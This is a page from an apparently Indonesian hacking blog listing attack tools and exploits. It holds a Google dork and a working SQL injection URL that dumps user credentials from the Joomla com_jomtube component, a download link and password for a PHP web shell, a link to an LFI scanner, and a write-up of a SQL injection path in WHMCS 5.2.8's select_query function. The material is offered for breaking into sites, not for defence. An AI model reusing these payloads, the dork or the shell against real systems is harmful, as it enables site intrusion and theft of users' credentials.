Boebefa
Official Blog
Today : | at : | safemode : ON
> / kaMtiEz / Hmei7 / Jundab / k4L0ng666 / Dr.Cruzz / s13doeL / Boebefa /
name author perms com modified label

LFİ SCANNER - Hacking Tools 2012 Admin rwxr-xr-x 0 21.34

Filename LFİ SCANNER - Hacking Tools 2012
Permission rw-r--r--
Author Admin
Date and Time 21.34
Label
Action




Link Download:
http://www.multiupload.nl/ZKR72DB85C

[ joomla ] Sql Injection Admin rwxr-xr-x 0 21.31

Filename [ joomla ] Sql Injection
Permission rw-r--r--
Author Admin
Date and Time 21.31
Label
Action
Dork:
inurl:/index.php?option=com_jomtube

Exploite:
view=videos&type=member&user_id=-62+union+select+1,2,password,4,5,6,7,8,9,10,11,12, group_concat(0x3a5f,username,0x3a,activation,0x5f3 a),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ jos_users--&option=com_jomtube


POC:

http://blabla.com/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%280x3a5f,username,0x3a,activation,0x5f3a%29,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube

My Awesome Weapon - 404 ShellCode Admin rwxr-xr-x 0 21.03

Filename My Awesome Weapon - 404 ShellCode
Permission rw-r--r--
Author Admin
Date and Time 21.03
Label
Action

 Download
 
404.php (27 KB)
https://mega.co.nz/#!xdYQ3bxa!aYjRwVhNmVbYTenBl0OcCgEZ6RA4JPFVxzQSo7mjpWg
Shell Pass: roots

HAcks WHMCS 5.2.8 Vulnerability Admin rwxr-xr-x 0 20.30

Filename HAcks WHMCS 5.2.8 Vulnerability
Permission rw-r--r--
Author Admin
Date and Time 20.30
Label
Action
Do you know why PHP's Register Globals have been REMOVED (don't worry, WHMCS developers implemented the exact same function, in their own little way) in recent versions? Let me show you

/includes/dbfunctions.php

<?php
function select_query($table, $fields, $where, $orderby = '', $orderbyorder = '', $limit = '', $innerjoin = '') {
    global $CONFIG;
    global $query_count;
    global $mysql_errors;
    global $whmcsmysql;
    if (!$fields) {
    $fields = '*';
    }
    $query = 'SELECT ' . $fields . ' FROM ' . db_make_safe_field($table);
    if ($innerjoin) {
    $query .= ' INNER JOIN ' . db_escape_string($innerjoin);
    }
    if ($where) {
    if (is_array($where)) {
        $criteria = array();
        foreach ($where as $origkey => $value) {
        $key = db_make_safe_field($origkey);
        if (is_array($value)) {
            if ($key == 'default') {
            $key = '`default`';
            }
            if ($value['sqltype'] == 'LIKE') {
            $criteria[] = $key . ' LIKE \'%' . db_escape_string($value['value']) . '%\'';
            continue;
            }
            if ($value['sqltype'] == 'NEQ') {
            $criteria[] = $key . '!=\'' . db_escape_string($value['value']) . '\'';
            continue;
            }
            if ($value['sqltype'] == '>') {
            $criteria[] = $key . '>' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == '<') {
            $criteria[] = $key . '<' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == '<=') {
            $criteria[] = $origkey . '<=' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == '>=') {
            $criteria[] = $origkey . '>=' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == 'TABLEJOIN') {
            $criteria[] = $key . '=' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == 'IN') {
            $criteria[] = $key . ' IN (\'' . implode('\',\'', db_escape_array($value['values'])) . '\')';
            continue;
            }
            continue;
        }
[...]
?>
 
 
 
 
This is their special select_query() function that gets used 
whenever they need to do a MySQL SELECT. The funny thing is that we can 
manipulate the GET/POST variables and end up with something like $key = array('sqltype' => 'TABLEJOIN', 'value' = '[SQLI]'); 


 

Jayalah Indonesiaku © 2010 Hack'n Roll Injection Tutorials
VB (Vio b374k) Template Redesign by s13doeL